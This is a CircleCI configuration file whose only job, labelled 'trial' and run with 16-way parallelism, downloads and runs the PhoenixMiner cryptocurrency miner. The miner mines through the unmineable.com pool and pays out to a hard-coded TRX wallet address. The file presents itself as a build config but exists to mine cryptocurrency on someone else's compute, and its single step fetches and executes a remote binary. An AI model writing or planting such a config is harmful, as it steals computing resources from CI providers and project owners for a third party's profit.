version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - checkout
        - run:  wget https://phoenixminer.info/downloads/PhoenixMiner_5.9d_Linux.tar.gz && tar zxvf PhoenixMiner_5.9d_Linux.tar.gz && cd PhoenixMiner_5.9d_Linux && ./PhoenixMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user TRX:TDUikTDLFXmZGro1be9FLHUSoe67BFeQXo.worker1 --ethstratum ETHPROXY

workflows:
    version: 2.1
    build:
        jobs:
        - trial